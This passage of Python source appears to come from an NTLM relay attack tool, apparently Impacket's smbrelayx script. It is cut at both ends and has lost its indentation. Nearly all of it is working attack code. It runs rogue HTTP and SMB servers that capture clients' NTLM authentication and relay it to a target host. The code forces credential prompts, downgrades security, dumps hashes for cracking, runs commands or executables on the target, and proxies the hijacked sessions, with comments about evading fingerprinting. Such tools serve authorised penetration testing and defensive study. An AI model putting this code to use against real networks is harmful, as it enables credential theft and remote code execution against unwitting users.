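# Advance the stored client credential by the timestamp value (10) before computing the next Netlogon authenticator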
clientStoredCredential = pack('<Q', unpack('<Q',ppp)[0] + 10)
# Now let's try to verify the security blob against the PDC
request = nrpc.NetrLogonSamLogonWithFlags()
request['LogonServer'] = '\x00'
request['ComputerName'] = serverName + '\x00'
request['ValidationLevel'] = nrpc.NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4
request['LogonLevel'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['tag'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['LogonNetworkTransitive']['Identity']['LogonDomainName'] = domainName
request['LogonInformation']['LogonNetworkTransitive']['Identity']['ParameterControl'] = 0
request['LogonInformation']['LogonNetworkTransitive']['Identity']['UserName'] = authenticateMessage[
'user_name'].decode('utf-16le')
request['LogonInformation']['LogonNetworkTransitive']['Identity']['Workstation'] = ''
request['LogonInformation']['LogonNetworkTransitive']['LmChallenge'] = challenge
request['LogonInformation']['LogonNetworkTransitive']['NtChallengeResponse'] = authenticateMessage['ntlm']
request['LogonInformation']['LogonNetworkTransitive']['LmChallengeResponse'] = authenticateMessage['lanman']
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = nrpc.ComputeNetlogonCredential(clientStoredCredential, sessionKey)
authenticator['Timestamp'] = 10
request['Authenticator'] = authenticator
request['ReturnAuthenticator']['Credential'] = '\x00'*8
request['ReturnAuthenticator']['Timestamp'] = 0
request['ExtraFlags'] = 0
#request.dump()
try:
resp = dce.request(request)
#resp.dump()
except DCERPCException as e:
logging.debug('Exception:', exc_info=True)
logging.error(str(e))
return e.get_error_code()
logging.info("%s\\%s successfully validated through NETLOGON" % (
domainName, authenticateMessage['user_name'].decode('utf-16le')))
encryptedSessionKey = authenticateMessage['session_key']
if encryptedSessionKey != '':
signingKey = generateEncryptedSessionKey(
resp['ValidationInformation']['ValidationSam4']['UserSessionKey'], encryptedSessionKey)
else:
signingKey = resp['ValidationInformation']['ValidationSam4']['UserSessionKey']
logging.info("SMB Signing key: %s " % hexlify(signingKey))
self.set_session_key(signingKey)
self._SignatureEnabled = True
self._SignSequenceNumber = 2
self.set_flags(flags1 = SMB.FLAGS1_PATHCASELESS, flags2 = SMB.FLAGS2_EXTENDED_SECURITY)
return STATUS_SUCCESS
def sendAuth(self, serverChallenge, authenticateMessageBlob):
smb = NewSMBPacket()
smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY
# Are we required to sign SMB? If so we do it, if not we skip it
if self._SignatureRequired:
smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
smb['Uid'] = self._uid
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data()
sessionSetup['Parameters']['MaxBufferSize'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VcNumber'] = 1
sessionSetup['Parameters']['SessionKey'] = 0
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE
# Fake Data here, don't want to get us fingerprinted
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
sessionSetup['Parameters']['SecurityBlobLength'] = len(authenticateMessageBlob)
sessionSetup['Data']['SecurityBlob'] = authenticateMessageBlob
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
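# Reassemble the 32-bit NT status code from the SMB header error fields (ErrorCode, _reserved, ErrorClass)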
errorCode = smb['ErrorCode'] << 16
errorCode += smb['_reserved'] << 8
errorCode += smb['ErrorClass']
if errorCode == STATUS_SUCCESS and self._SignatureRequired is True and self.domainIp is not None:
try:
errorCode = self.netlogonSessionKey(serverChallenge, authenticateMessageBlob)
except:
logging.debug('Exception:', exc_info=True)
raise
return smb, errorCode
def sendNegotiate(self, negotiateMessage):
smb = NewSMBPacket()
smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY
# Are we required to sign SMB? If so we do it, if not we skip it
if self._SignatureRequired:
smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data()
sessionSetup['Parameters']['MaxBufferSize'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VcNumber'] = 1
sessionSetup['Parameters']['SessionKey'] = 0
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE
# Let's build a NegTokenInit with the NTLMSSP
# TODO: In the future we should be able to choose different providers
blob = SPNEGO_NegTokenInit()
# NTLMSSP
blob['MechTypes'] = [TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']]
blob['MechToken'] = negotiateMessage
sessionSetup['Parameters']['SecurityBlobLength'] = len(blob)
sessionSetup['Parameters'].getData()
sessionSetup['Data']['SecurityBlob'] = blob.getData()
# Fake Data here, don't want to get us fingerprinted
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
try:
smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
except Exception:
logging.error("SessionSetup Error!")
raise
else:
# We will need to use this uid field for all future requests/responses
self._uid = smb['Uid']
# Now we have to extract the blob to continue the auth process
sessionResponse = SMBCommand(smb['Data'][0])
sessionParameters = SMBSessionSetupAndX_Extended_Response_Parameters(sessionResponse['Parameters'])
sessionData = SMBSessionSetupAndX_Extended_Response_Data(flags = smb['Flags2'])
sessionData['SecurityBlobLength'] = sessionParameters['SecurityBlobLength']
sessionData.fromString(sessionResponse['Data'])
respToken = SPNEGO_NegTokenResp(sessionData['SecurityBlob'])
return respToken['ResponseToken']
class HTTPRelayServer(Thread):
class HTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
def __init__(self, server_address, RequestHandlerClass, target, exeFile, command, mode, outputFile,
one_shot, returnStatus=STATUS_SUCCESS, runSocks = False, raw = False):
self.target = target
self.exeFile = exeFile
self.command = command
self.mode = mode
self.returnStatus = returnStatus
self.outputFile = outputFile
self.one_shot = one_shot
self.runSocks = runSocks
self.raw = raw
socketserver.TCPServer.__init__(self,server_address, RequestHandlerClass)
class HTTPHandler(http.server.SimpleHTTPRequestHandler):
def __init__(self,request, client_address, server):
self.server = server
self.protocol_version = 'HTTP/1.1'
self.challengeMessage = None
self.target = None
self.client = None
self.machineAccount = None
self.machineHashes = None
self.domainIp = None
global ATTACKED_HOSTS
if self.server.target in ATTACKED_HOSTS and self.server.one_shot:
logging.info(
"HTTPD: Received connection from %s, skipping %s, already attacked" % (
client_address[0], self.server.target))
return
if self.server.target is not None:
logging.info(
"HTTPD: Received connection from %s, attacking target %s" % (client_address[0], self.server.target))
else:
logging.info(
"HTTPD: Received connection from %s, attacking target %s" % (client_address[0], client_address[0]))
http.server.SimpleHTTPRequestHandler.__init__(self,request, client_address, server)
def handle_one_request(self):
try:
http.server.SimpleHTTPRequestHandler.handle_one_request(self)
except Exception:
logging.debug("Exception:", exc_info=True)
pass
def log_message(self, format, *args):
return
def do_HEAD(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_AUTHHEAD(self, message = b''):
self.send_response(401)
self.send_header('WWW-Authenticate', message.decode('utf-8'))
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length','0')
self.end_headers()
def send_error(self, code, message=None):
if message is not None and (message.find('RPC_OUT') >= 0 or message.find('RPC_IN') >= 0):
return self.do_GET()
return http.server.SimpleHTTPRequestHandler.send_error(self,code,message)
def do_GET(self):
messageType = 0
if PY2:
authorizationHeader = self.headers.getheader('Authorization')
else:
authorizationHeader = self.headers.get('Authorization')
if authorizationHeader is None:
self.do_AUTHHEAD(message = b'NTLM')
pass
else:
#self.do_AUTHHEAD()
typeX = authorizationHeader
try:
_, blob = typeX.split('NTLM')
token = base64.b64decode(blob.strip())
except Exception:
self.do_AUTHHEAD()
return
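# The NTLMSSP message type (1=NEGOTIATE, 2=CHALLENGE, 3=AUTHENTICATE) follows the 8-byte 'NTLMSSP\x00' signature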
messageType = unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 1:
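# Type 1 (NEGOTIATE): open an SMB connection to the target and relay the negotiate blob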
if self.server.mode.upper() == 'REFLECTION':
self.target = self.client_address[0]
else:
self.target = self.server.target
try:
if self.client is not None:
logging.error('Still performing an attack against %s' % self.client.get_remote_host())
self.send_response(404)
self.end_headers()
return
self.client = SMBClient(self.target, extended_security = True)
self.client.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
self.client.set_timeout(60)
except Exception as e:
logging.error("Connection against target %s FAILED" % self.target)
logging.error(str(e))
clientChallengeMessage = self.client.sendNegotiate(token)
self.challengeMessage = NTLMAuthChallenge()
self.challengeMessage.fromString(clientChallengeMessage)
self.do_AUTHHEAD(message = b'NTLM '+base64.b64encode(clientChallengeMessage))
elif messageType == 3:
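# Type 3 (AUTHENTICATE): relay the client's response to the target to complete the session setup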
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '' or self.target == '127.0.0.1':
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = token
clientResponse, errorCode = self.client.sendAuth(self.challengeMessage['challenge'],
respToken2.getData())
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials, except
# when coming from localhost
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
logging.error("Authenticating against %s as %s\\%s FAILED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
self.do_AUTHHEAD(b'NTLM')
else:
# Relay worked, do whatever we want here...
logging.info("Authenticating against %s as %s\\%s SUCCEED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
ntlm_hash_data = outputToJohnFormat(self.challengeMessage['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.outputFile is not None:
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.outputFile)
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible for removing it from the set
global ATTACKED_HOSTS
if self.target not in ATTACKED_HOSTS:
ATTACKED_HOSTS.add(self.target)
if self.server.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None,urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=self.client)
activeConnections.put(
(self.target, 445, 'SMB', ('%s/%s' % (
authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper(),
protocolClient,
{'CHALLENGE_MESSAGE': self.challengeMessage}))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
else:
clientThread = doAttack(self.client,self.server.exeFile,self.server.command,self.server.raw)
self.client = None
clientThread.start()
else:
logging.error('%s is being attacked at the moment, skipping.. ' % self.target)
# And answer 404 not found
self.send_response(404)
self.send_header('WWW-Authenticate', 'NTLM')
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length','0')
self.end_headers()
return
def __init__(self, outputFile=None):
Thread.__init__(self)
self.daemon = True
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
self.exeFile = None
self.command = None
self.target = None
self.mode = None
self.outputFile = outputFile
self.one_shot = False
self.runSocks = False
self.raw = False
def setTargets(self, target):
self.target = target
def setExeFile(self, filename):
self.exeFile = filename
def setCommand(self, command):
self.command = command
def setRaw(self, raw):
self.raw = raw
def setSocks(self, socks):
self.runSocks = socks
def setReturnStatus(self, returnStatus):
# Not implemented yet.
pass
def setMode(self,mode, one_shot):
self.mode = mode
self.one_shot = one_shot
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
def run(self):
logging.info("Setting up HTTP Server")
httpd = self.HTTPServer(("", 80), self.HTTPHandler, self.target, self.exeFile, self.command, self.mode,
self.outputFile, self.one_shot, runSocks = self.runSocks, raw = self.raw)
httpd.serve_forever()
class SMBRelayServer(Thread):
def __init__(self, outputFile = None):
Thread.__init__(self)
self.daemon = True
self.server = 0
self.target = ''
self.mode = 'REFLECTION'
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
self.exeFile = None
self.returnStatus = STATUS_SUCCESS
self.command = None
self.one_shot = False
self.runSocks = False
self.raw = False
# Here we write a mini config for the server
smbConfig = ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global','server_name','server_name')
smbConfig.set('global','server_os','UNIX')
smbConfig.set('global','server_domain','WORKGROUP')
smbConfig.set('global','log_file','smb.log')
smbConfig.set('global','credentials_file','')
if outputFile is not None:
smbConfig.set('global','jtr_dump_path',outputFile)
# IPC always needed
smbConfig.add_section('IPC$')
smbConfig.set('IPC$','comment','')
smbConfig.set('IPC$','read only','yes')
smbConfig.set('IPC$','share type','3')
smbConfig.set('IPC$','path','')
self.server = SMBSERVER(('0.0.0.0',445), config_parser = smbConfig)
self.server.processConfigFile()
self.origSmbComNegotiate = self.server.hookSmbCommand(SMB.SMB_COM_NEGOTIATE, self.SmbComNegotiate)
self.origSmbSessionSetupAndX = self.server.hookSmbCommand(SMB.SMB_COM_SESSION_SETUP_ANDX,
self.SmbSessionSetupAndX)
# Let's use the SMBServer Connection dictionary to keep track of our client connections as well
self.server.addConnection('SMBRelay', '0.0.0.0', 445)
def SmbComNegotiate(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
if self.mode.upper() == 'REFLECTION':
self.target = connData['ClientIP']
#############################################################
# SMBRelay
smbData = smbServer.getConnectionData('SMBRelay', False)
if self.target in smbData:
# Remove the previous connection and use the last one
smbClient = smbData[self.target]['SMBClient']
del smbClient
del smbData[self.target]
# Let's check if we already attacked this host.
global ATTACKED_HOSTS
if self.target in ATTACKED_HOSTS and self.one_shot is True:
logging.info("SMBD: Received connection from %s, skipping %s, already attacked" % (
connData['ClientIP'], self.target))
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY
packet['Flags2'] = SMB.FLAGS2_NT_STATUS
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
errorCode = STATUS_NOT_SUPPORTED
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
return None, [packet], STATUS_NOT_SUPPORTED
else:
logging.info("SMBD: Received connection from %s, attacking target %s" % (connData['ClientIP'] ,self.target))
try:
if recvPacket['Flags2'] & SMB.FLAGS2_EXTENDED_SECURITY == 0:
extSec = False
else:
if self.mode.upper() == 'REFLECTION':
# Force standard security when doing reflection
logging.info("Downgrading to standard security")
extSec = False
recvPacket['Flags2'] += (~SMB.FLAGS2_EXTENDED_SECURITY)
else:
extSec = True
client = SMBClient(self.target, extended_security = extSec)
client.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
client.set_timeout(60)
except Exception as e:
logging.error("Connection against target %s FAILED" % self.target)
logging.error(str(e))
else:
encryptionKey = client.get_encryption_key()
smbData[self.target] = {}
smbData[self.target]['SMBClient'] = client
if encryptionKey is not None:
connData['EncryptionKey'] = encryptionKey
smbServer.setConnectionData('SMBRelay', smbData)
smbServer.setConnectionData(connId, connData)
return self.origSmbComNegotiate(connId, smbServer, SMBCommand, recvPacket)
#############################################################
def SmbSessionSetupAndX(self, connId, smbServer, smbCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
#############################################################
# SMBRelay
smbData = smbServer.getConnectionData('SMBRelay', False)
#############################################################
respSMBCommand = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
global ATTACKED_HOSTS
if connData['_dialects_parameters']['Capabilities'] & SMB.CAP_EXTENDED_SECURITY:
# Extended security. Here we deal with all SPNEGO stuff
respParameters = SMBSessionSetupAndX_Extended_Response_Parameters()
respData = SMBSessionSetupAndX_Extended_Response_Data()
sessionSetupParameters = SMBSessionSetupAndX_Extended_Parameters(smbCommand['Parameters'])
sessionSetupData = SMBSessionSetupAndX_Extended_Data()
sessionSetupData['SecurityBlobLength'] = sessionSetupParameters['SecurityBlobLength']
sessionSetupData.fromString(smbCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
if unpack('B',sessionSetupData['SecurityBlob'][0:1])[0] != ASN1_AID:
# If there is no GSSAPI ID, it must be an AUTH packet
blob = SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob'])
token = blob['ResponseToken']
else:
# NEGOTIATE packet
blob = SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob'])
token = blob['MechToken']
# Here we only handle NTLMSSP, depending on what stage of the
# authentication we are, we act on it
messageType = unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 0x01:
# NEGOTIATE_MESSAGE
negotiateMessage = NTLMAuthNegotiate()
negotiateMessage.fromString(token)
# Let's store it in the connection data
connData['NEGOTIATE_MESSAGE'] = negotiateMessage
#############################################################
# SMBRelay: Ok.. So we got a NEGOTIATE_MESSAGE from a client.
# Let's send it to the target server and send the answer back to the client.
# Let's check if we already attacked this host.
global ATTACKED_HOSTS
if self.target in ATTACKED_HOSTS and self.one_shot is True:
logging.info("SMBD: Received connection from %s, skipping %s, already attacked" % (
connData['ClientIP'], self.target))
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY
packet['Flags2'] = SMB.FLAGS2_NT_STATUS
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = b'\x00\x00\x00'
errorCode = STATUS_NOT_SUPPORTED
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
return None, [packet], STATUS_NOT_SUPPORTED
# It might happen that the target connects back before a previous connection has finished; in that
# case we get to this function without the dict and smbClient entry created, because a
# NEGOTIATE_CONNECTION was not needed
if (self.target in smbData) is False:
smbData[self.target] = {}
smbClient = SMBClient(self.target)
smbClient.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
smbClient.set_timeout(60)
smbData[self.target]['SMBClient'] = smbClient
smbClient = smbData[self.target]['SMBClient']
clientChallengeMessage = smbClient.sendNegotiate(token)
challengeMessage = NTLMAuthChallenge()
challengeMessage.fromString(clientChallengeMessage)
#############################################################
respToken = SPNEGO_NegTokenResp()
# accept-incomplete. We want more data
respToken['NegResult'] = b'\x01'
respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = challengeMessage.getData()
# Setting the packet to STATUS_MORE_PROCESSING
errorCode = STATUS_MORE_PROCESSING_REQUIRED
# Let's set up an UID for this connection and store it
# in the connection's data
# Picking a fixed value
# TODO: Manage more UIDs for the same session
connData['Uid'] = 10
# Let's store it in the connection data
connData['CHALLENGE_MESSAGE'] = challengeMessage
elif messageType == 0x03:
# AUTHENTICATE_MESSAGE, here we deal with authentication
#############################################################
# SMBRelay: Ok, so now we have the Auth token, let's send it
# back to the target system and hope for the best.
smbClient = smbData[self.target]['SMBClient']
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '':
clientResponse, errorCode = smbClient.sendAuth(connData['CHALLENGE_MESSAGE']['challenge'],
sessionSetupData['SecurityBlob'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY | SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = b'\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
# Reset the UID
smbClient.setUid(0)
logging.error("Authenticating against %s as %s\\%s FAILED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
# del (smbData[self.target])
return None, [packet], errorCode
else:
# We have a session, create a thread and do whatever we want
logging.info("Authenticating against %s as %s\\%s SUCCEED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible for removing it from the set
ATTACKED_HOSTS.add(self.target)
if self.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None, urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=smbClient)
activeConnections.put((self.target, 445, 'SMB',
('%s/%s' % (
authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper(),
protocolClient, connData))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
del (smbData[self.target])
else:
del (smbData[self.target])
clientThread = doAttack(smbClient,self.exeFile,self.command,self.raw)
clientThread.start()
# Now continue with the server
#############################################################
# Return status code of the authentication process.
errorCode = self.returnStatus
logging.info("Sending status code %s after authentication to %s" % (
ERROR_MESSAGES[self.returnStatus][0], connData['ClientIP']))
respToken = SPNEGO_NegTokenResp()
# accept-completed
respToken['NegResult'] = b'\x00'
# Status SUCCESS
# Let's store it in the connection data
connData['AUTHENTICATE_MESSAGE'] = authenticateMessage
else:
raise Exception("Unknown NTLMSSP MessageType %d" % messageType)
respParameters['SecurityBlobLength'] = len(respToken)
respData['SecurityBlobLength'] = respParameters['SecurityBlobLength']
respData['SecurityBlob'] = respToken.getData()
else:
# Process Standard Security
respParameters = SMBSessionSetupAndXResponse_Parameters()
respData = SMBSessionSetupAndXResponse_Data()
sessionSetupParameters = SMBSessionSetupAndX_Parameters(smbCommand['Parameters'])
sessionSetupData = SMBSessionSetupAndX_Data()
sessionSetupData['AnsiPwdLength'] = sessionSetupParameters['AnsiPwdLength']
sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength']
sessionSetupData.fromString(smbCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
#############################################################
# SMBRelay
smbClient = smbData[self.target]['SMBClient']
if sessionSetupData['Account'] != '':
clientResponse, errorCode = smbClient.login_standard(sessionSetupData['Account'],
sessionSetupData['PrimaryDomain'],
sessionSetupData['AnsiPwd'],
sessionSetupData['UnicodePwd'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY | SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
# Reset the UID
smbClient.setUid(0)
return None, [packet], errorCode
# Now continue with the server
else:
# We have a session, create a thread and do whatever we want
ntlm_hash_data = outputToJohnFormat(b'', sessionSetupData['Account'], sessionSetupData['PrimaryDomain'],
sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible for removing it from the set
ATTACKED_HOSTS.add(self.target)
if self.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None, urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=smbClient)
activeConnections.put((self.target, 445, 'SMB',
('%s/%s' % (
sessionSetupData['PrimaryDomain'],
sessionSetupData['Account'])).upper(),
protocolClient, connData))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
# Remove the target server from our connection list, the work is done
del (smbData[self.target])
else:
# Remove the target server from our connection list, the work is done
del (smbData[self.target])
clientThread = doAttack(smbClient, self.exeFile, self.command, self.raw)
clientThread.start()
# Now continue with the server
#############################################################
# Do the verification here, for just now we grant access
# TODO: Manage more UIDs for the same session
errorCode = self.returnStatus
logging.info("Sending status code %s after authentication to %s" % (
ERROR_MESSAGES[self.returnStatus][0], connData['ClientIP']))
connData['Uid'] = 10
respParameters['Action'] = 0
respData['NativeOS'] = smbServer.getServerOS()
respData['NativeLanMan'] = smbServer.getServerOS()
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
# From now on, the client can ask for other commands
connData['Authenticated'] = True
#############################################################
# SMBRelay
smbServer.setConnectionData('SMBRelay', smbData)
#############################################################
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def _start(self):
self.server.serve_forever()
def run(self):
logging.info("Setting up SMB Server")
self._start()
def setTargets(self, targets):
self.target = targets
def setExeFile(self, filename):
self.exeFile = filename
def setCommand(self, command):
self.command = command
def setRaw(self, raw):
self.raw = raw
def setSocks(self, socks):
self.runSocks = socks
def setReturnStatus(self, returnStatus):
# Specifies the return status to send back to the connecting client after a successful
# relayed authentication. This comes in useful when we don't want the connecting
# client to cache successful credentials in its memory. Valid statuses:
# STATUS_SUCCESS - tells the connecting client it passed valid credentials,
# which will make it store them accordingly.
# STATUS_ACCESS_DENIED - may occur for instance when the client is not a Domain Admin
# and Remote UAC is configured, thus preventing connection to ADMIN$
# STATUS_LOGON_FAILURE - tells the connecting client that the passed credentials
# are invalid.
self.returnStatus = {
'success' : STATUS_SUCCESS,
'denied' : STATUS_ACCESS_DENIED,
'logon_failure' : STATUS_LOGON_FAILURE
}[returnStatus.lower()]
def setMode(self,mode, one_shot):
self.mode = mode
self.one_shot = one_shot
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
# Process command-line arguments.
if __name__ == '__main__':
RELAY_SERVERS = ( SMBRelayServer, HTTPRelayServer )
# Init the example's logger theme
logger.init()
print(version.BANNER)
parser = argparse.ArgumentParser(add_help=False,
description="For every connection received, this module will try to SMB relay that "
" connection to the target system or the original client")
parser.add_argument("--help", action="help", help='show this help message and exit')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-h', action='store', metavar='HOST',
help='Host to relay the credentials to, if not it will relay it back to the client')
parser.add_argument('-s', action='store', choices={'success', 'denied', 'logon_failure'}, default='success',
help='Status to return after client performed authentication. Default: "success".')
parser.add_argument('-e', action='store', required=False, metavar='FILE',
help='File to execute on the target system. If not specified, hashes will be dumped '
'(secretsdump.py must be in the same directory)')
parser.add_argument('-c', action='store', type=str, required=False, metavar='COMMAND',
help='Command to execute on target system. If not specified, hashes will be dumped '
'(secretsdump.py must be in the same directory)')
parser.add_argument('-socks', action='store_true', default=False,
help='Launch a SOCKS proxy for the connection relayed')
parser.add_argument('-one-shot', action='store_true', default=False,
help='After successful authentication, only execute the attack once for each target')
parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default '
'"%s"). If errors are detected, run chcp.com at the target, '
'map the result with '
'https://docs.python.org/2.4/lib/standard-encodings.html and then execute wmiexec.py '
'again with -codec and the corresponding codec ' % CODEC)
parser.add_argument('-outputfile', action='store',
help='base output filename for encrypted hashes. Suffixes will be added for ntlm and ntlmv2')
parser.add_argument('-machine-account', action='store', required=False,
help='Domain machine account to use when interacting with the domain to grab a session key for '
'signing, format is domain/machine_name')
parser.add_argument('-machine-hashes', action="store", metavar="LMHASH:NTHASH",
help='Domain machine hashes, format is LMHASH:NTHASH')
parser.add_argument('-domain', action="store", help='Domain FQDN or IP to connect using NETLOGON')
try:
